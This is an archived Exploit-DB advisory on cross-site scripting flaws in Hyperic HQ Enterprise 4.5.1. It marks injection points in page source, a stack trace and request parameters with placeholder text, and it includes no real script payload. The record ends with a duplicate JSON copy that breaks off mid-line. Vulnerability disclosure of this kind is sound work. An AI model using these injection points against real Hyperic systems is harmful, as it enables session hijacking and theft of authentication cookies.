Search...

Hyperic HQ Enterprise 4.5.1 Cross Site Scripting and Multiple Unspecified Security Vulnerabilities

2011-11-01T00:00:00

ID EDB-ID:36275
Type exploitdb
Reporter Benjamin Kunz Mejri
Modified 2011-11-01T00:00:00

Description

Hyperic HQ Enterprise 4.5.1 Cross Site Scripting and Multiple Unspecified Security Vulnerabilities. Webapps exploit for jsp platform

                                        
                                            source: http://www.securityfocus.com/bid/50456/info

Hyperic HQ Enterprise is prone to a cross-site scripting vulnerability and multiple unspecified security vulnerabilities.

An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials. The impact of other issues is unknown.

These issues affect Hyperic HQ Enterprise 4.5.1; other versions may also be affected. 

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers or local & low privileged user accounts.
For demonstration or reproduce ...

1.1
Code Review: HQ Roles  [IVE - Persistent]

&lt;td width="30%" class="BlockContent"&gt;
&lt;!-- END VIEW MODE --&gt; 
&lt;/td&gt;&lt;/tr&gt;&lt;tr valign="top"&gt;
&lt;td width="20%" class="BlockLabel"&gt;Dashboard Name:&lt;/td&gt;
&lt;td width="30%" class="BlockContent"&gt;
&lt;span id="dashboardString"&gt;New Role Dashboard&lt;/span&gt;&lt;/td&gt;
&lt;td width="20%" class="BlockLabel"&gt;&lt;/td&gt;
&lt;td width="30%" class="BlockContent"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;!--  /  --&gt;


Code Review: java.security.krb5.kdc   Module: HQ Health / HQ Process Information & Diagnostics  [IVE - Persistent]

- java.rmi.server.codebase = http://h1461735:9093/ 
- java.rmi.server.hostname = h1461735 
- java.runtime.name = Java(TM) SE Runtime Environment 
- java.runtime.version = 1.6.0_13-b03 
- java.security.krb5.kdc = &gt;"&lt;INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!&gt; 
- java.security.krb5.realm = &gt;"&lt;INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!&gt; 
- java.specification.name = Java Platform API Specification 
- java.specification.vendor = Sun Microsystems Inc. 
- java.specification.version = 1.6 
- java.vendor = Sun Microsystems Inc. 

.../PoC/printReport(poc).hqu



Code Review: Browse - Monitor - Indikators  [IVE - Persistent]


hyperic.data.escalation.pauseSelect.options[12] = new Option("72 hours", "259200000");
hyperic.data.escalation.pauseSelect.options[13] = new Option("Until Fixed", "9223372036854775807");
&lt;/script&gt;
&lt;title&gt;
HQ View Application Monitor Current Health - &gt;"&lt;INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!&gt;
&lt;/title&gt;
&lt;script type="text/javascript"&gt;
var onloads = [];
function initOnloads() {
            if (arguments.callee.done) return;

... or

  hyperic.data.escalation.pauseSelect.options[12] = new Option("72 hours", "259200000");
  hyperic.data.escalation.pauseSelect.options[13] = new Option("Until Fixed", "9223372036854775807");
&lt;/script&gt;
  &lt;title&gt;
   &gt;"&lt;INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!&gt;
  &lt;/title&gt;
    &lt;script type="text/javascript"&gt;
        var onloads = [];
         function initOnloads() {
        
            if (arguments.callee.done) return;
            arguments.callee.done = true;
           if(typeof(_timer)!="undefined") clearInterval(_timer);
           for ( var i = 0 ; i &lt; onloads.length ; i++ )
             onloads[i]();



Code Review: Applications ďż˝ All Applications - Topic  [IVE - Persistent]

&lt;li class="hasSubmenu"&gt;&lt;a href=""&gt;Recently Viewed&lt;/a&gt;&lt;div&gt;&lt;ul&gt;
&lt;li&gt;&lt;a href="/Resource.do?eid=4:10001"&gt;"&lt;INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!&gt;;
&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/li&gt;&lt;li id="analyzeTab"&gt;&lt;a href="#"&gt;Analyze&lt;/a&gt;&lt;div&gt;&lt;ul&gt;



Code Review: General Properties - Inventory over Exception-Handling [IVE - Persistent]

&lt;div id="exception27" style="visibility:hidden"&gt;javax.servlet.jsp.JspTagException: javax.servlet.jsp.JspException: 
An error occurred while evaluating custom action attribute "sort" with value "${param.scs}": An exception occured trying to convert 
String "&gt;"&lt;INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!&gt;" to type "java.lang.Integer"
  at org.hyperic.hq.ui.taglib.display.TableTag.evalAttr(TableTag.java:1456)
  at org.hyperic.hq.ui.taglib.display.TableTag.evalAttr(TableTag.java:1438)
  at org.hyperic.hq.ui.taglib.display.TableTag.evaluateAttributes(TableTag.java:1517)
  at org.hyperic.hq.ui.taglib.display.TableTag.doStartTag(TableTag.java:226)
  at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspx_meth_display_005ftable_005f0(Unknown Source)
  at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspx_meth_html_005fform_005f0(Unknown Source)
  at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspService(Unknown Source)
  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
  at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
  at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
  at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
  at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
  at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
  at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
  at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
  at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
  at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
  at org.apache.jsp.resource.application.inventory.ViewApplication_jsp._jspx_meth_tiles_005finsert_005f8(Unknown Source)
  at org.apache.jsp.resource.application.inventory.ViewApplication_jsp._jspService(Unknown Source)
  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
  at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
  at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
  at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
  at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
  at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
  at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
  at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
  at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
  at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
  at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_tiles_005finsert_005f0(Unknown Source)
  at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_c_005fforEach_005f1(Unknown Source)
  at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_c_005fforEach_005f0(Unknown Source)
  at org.apache.jsp.portal.ColumnsLayout_jsp._jspService(Unknown Source)
  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
  at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
  at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
  at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
  at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
  at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
  at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
  at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
  at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
  at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
  at org.apache.jsp.portal.MainLayout_jsp._jspx_meth_tiles_005finsert_005f2(Unknown Source)
  at org.apache.jsp.portal.MainLayout_jsp._jspService(Unknown Source)
  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
  at org.apache.catalina.core.ApplicationDispatcher.processRequest(ApplicationDispatcher.java:445)
  at org.apache.catalina.core.ApplicationDispatcher.doForward(ApplicationDispatcher.java:379)
  at org.apache.catalina.core.ApplicationDispatcher.forward(ApplicationDispatcher.java:292)
  at org.apache.struts.action.RequestProcessor.doForward(RequestProcessor.java:1085)
  at org.apache.struts.tiles.TilesRequestProcessor.doForward(TilesRequestProcessor.java:263)
  at org.apache.struts.tiles.TilesRequestProcessor.processTilesDefinition(TilesRequestProcessor.java:239)
  at org.apache.struts.tiles.TilesRequestProcessor.internalModuleRelativeForward(TilesRequestProcessor.java:341)
  at org.apache.struts.action.RequestProcessor.processForward(RequestProcessor.java:572)
  at org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:221)
  at org.apache.struts.action.ActionServlet.process(ActionServlet.java:1196)
  at org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:414)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:690)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.hyperic.hq.ui.AuthenticationFilter.doFilter(AuthenticationFilter.java:167)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.hyperic.hibernate.filter.SessionFilter$1.run(SessionFilter.java:59)
  at org.hyperic.hq.hibernate.SessionManager.runInSessionInternal(SessionManager.java:79)
  at org.hyperic.hq.hibernate.SessionManager.runInSession(SessionManager.java:68)
  at org.hyperic.hibernate.filter.SessionFilter.doFilter(SessionFilter.java:57)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.tuckey.web.filters.urlrewrite.RuleChain.handleRewrite(RuleChain.java:164)
  at org.tuckey.web.filters.urlrewrite.RuleChain.doRules(RuleChain.java:141)
  at org.tuckey.web.filters.urlrewrite.UrlRewriter.processRequest(UrlRewriter.java:90)
  at org.tuckey.web.filters.urlrewrite.UrlRewriteFilter.doFilter(UrlRewriteFilter.java:417)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.hyperic.hq.product.servlet.filter.JMXFilter.doFilter(JMXFilter.java:322)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:230)
  at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:175)
  at org.jboss.web.tomcat.security.SecurityAssociationValve.invoke(SecurityAssociationValve.java:182)
  at org.jboss.web.tomcat.security.JaccContextValve.invoke(JaccContextValve.java:84)
  at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127)
  at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)
  at org.jboss.web.tomcat.service.jca.CachedConnectionValve.invoke(CachedConnectionValve.java:157)
  at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109)
  at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:262)
  at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:844)
  at org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:583)
  at org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:446)
  at java.lang.Thread.run(Unknown Source) &lt;/div&gt;


1.2
References:
http://www.example.com/admin/role/RoleAdmin.do?mode=new
http://www.example.com/hqu/health/health/printReport.hqu
http://www.example.com/Resource.do?eid=4:10001
http://www.example.com/ResourceHub.do
http://www.example.com/resource/application/Inventory.do?mode=view&accord=3&eid=4:10001&sos=dec&scs=




Code Review: Escalation Schemes Configuration [XSS]

http://www.example.com/admin/config/Config.do?mode=escalate&escId=[INCLUDE CLIENT_SIDE SCRIPTCODE HERE!!!]

References:
http://www.example.com/admin/config/Config.do?mode=escalate&escId=

JSON Vulners Source

Initial Source

{"id": "EDB-ID:36275", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Hyperic HQ Enterprise 4.5.1 Cross Site Scripting and Multiple Unspecified Security Vulnerabilities", "description": "Hyperic HQ Enterprise 4.5.1 Cross Site Scripting and Multiple Unspecified Security Vulnerabilities. Webapps exploit for jsp platform", "published": "2011-11-01T00:00:00", "modified": "2011-11-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/36275/", "reporter": "Benjamin Kunz Mejri", "references": [], "cvelist": [], "lastseen": "2016-02-04T03:07:47", "viewCount": 2, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2016-02-04T03:07:47", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-04T03:07:47", "rev": 2}, "vulnersScore": -0.1}, "sourceHref": "https://www.exploit-db.com/download/36275/", "sourceData": "source: http://www.securityfocus.com/bid/50456/info\r\n\r\nHyperic HQ Enterprise is prone to a cross-site scripting vulnerability and multiple unspecified security vulnerabilities.\r\n\r\nAn attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials. The impact of other issues is unknown.\r\n\r\nThese issues affect Hyperic HQ Enterprise 4.5.1; other versions may also be affected. \r\n\r\nProof of Concept:\r\n=================\r\nThe vulnerabilities can be exploited by remote attackers or local & low privileged user accounts.\r\nFor demonstration or reproduce ...\r\n\r\n1.1\r\nCode Review: HQ Roles [IVE - Persistent]\r\n\r\n<td width=\"30%\" class=\"BlockContent\">\r\n \r\n</td></tr><tr valign=\"top\">\r\n<td width=\"20%\" class=\"BlockLabel\">Dashboard Name:</td>\r\n<td width=\"30%\" class=\"BlockContent\">\r\n<span id=\"dashboardString\">New Role Dashboard</span></td>\r\n<td width=\"20%\" class=\"BlockLabel\"></td>\r\n<td width=\"30%\" class=\"BlockContent\"></td></tr></table>\r\n\r\n\r\n\r\nCode Review: java.security.krb5.kdc Module: HQ Health / HQ Process Information & Diagnostics [IVE - Persistent]\r\n\r\n- java.rmi.server.codebase = http://h1461735:9093/ \r\n- java.rmi.server.hostname = h1461735 \r\n- java.runtime.name = Java(TM) SE Runtime Environment \r\n- java.runtime.version = 1.6.0_13-b03 \r\n- java.security.krb5.kdc = >\"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!> \r\n- java.security.krb5.realm = >\"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!> \r\n- java.specification.name = Java Platform API Specification \r\n- java.specification.vendor = Sun Microsystems Inc. \r\n- java.specification.version = 1.6 \r\n- java.vendor = Sun Microsystems Inc. \r\n\r\n.../PoC/printReport(poc).hqu\r\n\r\n\r\n\r\nCode Review: Browse - Monitor - Indikators [IVE - Persistent]\r\n\r\n\r\nhyperic.data.escalation.pauseSelect.options[12] = new Option(\"72 hours\", \"259200000\");\r\nhyperic.data.escalation.pauseSelect.options[13] = new Option(\"Until Fixed\", \"9223372036854775807\");\r\n</script>\r\n<title>\r\nHQ View Application Monitor Current Health - >\"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>\r\n</title>\r\n<script type=\"text/javascript\">\r\nvar onloads = [];\r\nfunction initOnloads() {\r\n if (arguments.callee.done) return;\r\n\r\n... or\r\n\r\n hyperic.data.escalation.pauseSelect.options[12] = new Option(\"72 hours\", \"259200000\");\r\n hyperic.data.escalation.pauseSelect.options[13] = new Option(\"Until Fixed\", \"9223372036854775807\");\r\n</script>\r\n <title>\r\n >\"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>\r\n </title>\r\n <script type=\"text/javascript\">\r\n var onloads = [];\r\n function initOnloads() {\r\n \r\n if (arguments.callee.done) return;\r\n arguments.callee.done = true;\r\n if(typeof(_timer)!=\"undefined\") clearInterval(_timer);\r\n for ( var i = 0 ; i < onloads.length ; i++ )\r\n onloads[i]();\r\n\r\n\r\n\r\nCode Review: Applications \u010f\u017c\u02dd All Applications - Topic [IVE - Persistent]\r\n\r\n<li class=\"hasSubmenu\"><a href=\"\">Recently Viewed</a><div><ul>\r\n<li><a href=\"/Resource.do?eid=4:10001\">\"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>;\r\n</a></li></ul></div></li></ul></div></li><li id=\"analyzeTab\"><a href=\"#\">Analyze</a><div><ul>\r\n\r\n\r\n\r\nCode Review: General Properties - Inventory over Exception-Handling [IVE - Persistent]\r\n\r\n<div id=\"exception27\" style=\"visibility:hidden\">javax.servlet.jsp.JspTagException: javax.servlet.jsp.JspException: \r\nAn error occurred while evaluating custom action attribute \"sort\" with value \"${param.scs}\": An exception occured trying to convert \r\nString \">\"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>\" to type \"java.lang.Integer\"\r\n at org.hyperic.hq.ui.taglib.display.TableTag.evalAttr(TableTag.java:1456)\r\n at org.hyperic.hq.ui.taglib.display.TableTag.evalAttr(TableTag.java:1438)\r\n at org.hyperic.hq.ui.taglib.display.TableTag.evaluateAttributes(TableTag.java:1517)\r\n at org.hyperic.hq.ui.taglib.display.TableTag.doStartTag(TableTag.java:226)\r\n at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspx_meth_display_005ftable_005f0(Unknown Source)\r\n at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspx_meth_html_005fform_005f0(Unknown Source)\r\n at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspService(Unknown Source)\r\n at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)\r\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)\r\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)\r\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)\r\n at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)\r\n at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)\r\n at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)\r\n at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)\r\n at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)\r\n at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)\r\n at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)\r\n at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)\r\n at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)\r\n at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)\r\n at org.apache.jsp.resource.application.inventory.ViewApplication_jsp._jspx_meth_tiles_005finsert_005f8(Unknown Source)\r\n at org.apache.jsp.resource.application.inventory.ViewApplication_jsp._jspService(Unknown Source)\r\n at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)\r\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)\r\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)\r\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)\r\n at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)\r\n at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)\r\n at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)\r\n at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)\r\n at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)\r\n at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)\r\n at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)\r\n at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)\r\n at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)\r\n at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)\r\n at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_tiles_005finsert_005f0(Unknown Source)\r\n at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_c_005fforEach_005f1(Unknown Source)\r\n at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_c_005fforEach_005f0(Unknown Source)\r\n at org.apache.jsp.portal.ColumnsLayout_jsp._jspService(Unknown Source)\r\n at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)\r\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)\r\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)\r\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)\r\n at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)\r\n at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)\r\n at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)\r\n at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)\r\n at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)\r\n at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)\r\n at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)\r\n at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)\r\n at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)\r\n at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)\r\n at org.apache.jsp.portal.MainLayout_jsp._jspx_meth_tiles_005finsert_005f2(Unknown Source)\r\n at org.apache.jsp.portal.MainLayout_jsp._jspService(Unknown Source)\r\n at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)\r\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)\r\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)\r\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)\r\n at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)\r\n at org.apache.catalina.core.ApplicationDispatcher.processRequest(ApplicationDispatcher.java:445)\r\n at org.apache.catalina.core.ApplicationDispatcher.doForward(ApplicationDispatcher.java:379)\r\n at org.apache.catalina.core.ApplicationDispatcher.forward(ApplicationDispatcher.java:292)\r\n at org.apache.struts.action.RequestProcessor.doForward(RequestProcessor.java:1085)\r\n at org.apache.struts.tiles.TilesRequestProcessor.doForward(TilesRequestProcessor.java:263)\r\n at org.apache.struts.tiles.TilesRequestProcessor.processTilesDefinition(TilesRequestProcessor.java:239)\r\n at org.apache.struts.tiles.TilesRequestProcessor.internalModuleRelativeForward(TilesRequestProcessor.java:341)\r\n at org.apache.struts.action.RequestProcessor.processForward(RequestProcessor.java:572)\r\n at org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:221)\r\n at org.apache.struts.action.ActionServlet.process(ActionServlet.java:1196)\r\n at org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:414)\r\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:690)\r\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)\r\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)\r\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)\r\n at org.hyperic.hq.ui.AuthenticationFilter.doFilter(AuthenticationFilter.java:167)\r\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)\r\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)\r\n at org.hyperic.hibernate.filter.SessionFilter$1.run(SessionFilter.java:59)\r\n at org.hyperic.hq.hibernate.SessionManager.runInSessionInternal(SessionManager.java:79)\r\n at org.hyperic.hq.hibernate.SessionManager.runInSession(SessionManager.java:68)\r\n at org.hyperic.hibernate.filter.SessionFilter.doFilter(SessionFilter.java:57)\r\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)\r\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)\r\n at org.tuckey.web.filters.urlrewrite.RuleChain.handleRewrite(RuleChain.java:164)\r\n at org.tuckey.web.filters.urlrewrite.RuleChain.doRules(RuleChain.java:141)\r\n at org.tuckey.web.filters.urlrewrite.UrlRewriter.processRequest(UrlRewriter.java:90)\r\n at org.tuckey.web.filters.urlrewrite.UrlRewriteFilter.doFilter(UrlRewriteFilter.java:417)\r\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)\r\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)\r\n at org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)\r\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)\r\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)\r\n at org.hyperic.hq.product.servlet.filter.JMXFilter.doFilter(JMXFilter.java:322)\r\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)\r\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)\r\n at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:230)\r\n at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:175)\r\n at org.jboss.web.tomcat.security.SecurityAssociationValve.invoke(SecurityAssociationValve.java:182)\r\n at org.jboss.web.tomcat.security.JaccContextValve.invoke(JaccContextValve.java:84)\r\n at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127)\r\n at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)\r\n at org.jboss.web.tomcat.service.jca.CachedConnectionValve.invoke(CachedConnectionValve.java:157)\r\n at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109)\r\n at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:262)\r\n at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:844)\r\n at org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:583)\r\n at org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:446)\r\n at java.lang.Thread.run(Unknown Source) </div>\r\n\r\n\r\n1.2\r\nReferences:\r\nhttp://www.example.com/admin/role/RoleAdmin.do?mode=new\r\nhttp://www.example.com/hqu/health/health/printReport.hqu\r\nhttp://www.example.com/Resource.do?eid=4:10001\r\nhttp://www.example.com/ResourceHub.do\r\nhttp://www.example.com/resource/application/Inventory.do?mode=view&accord=3&eid=4:10001&sos=dec&scs=\r\n\r\n\r\n\r\n\r\nCode Review: Escalation Schemes Configuration 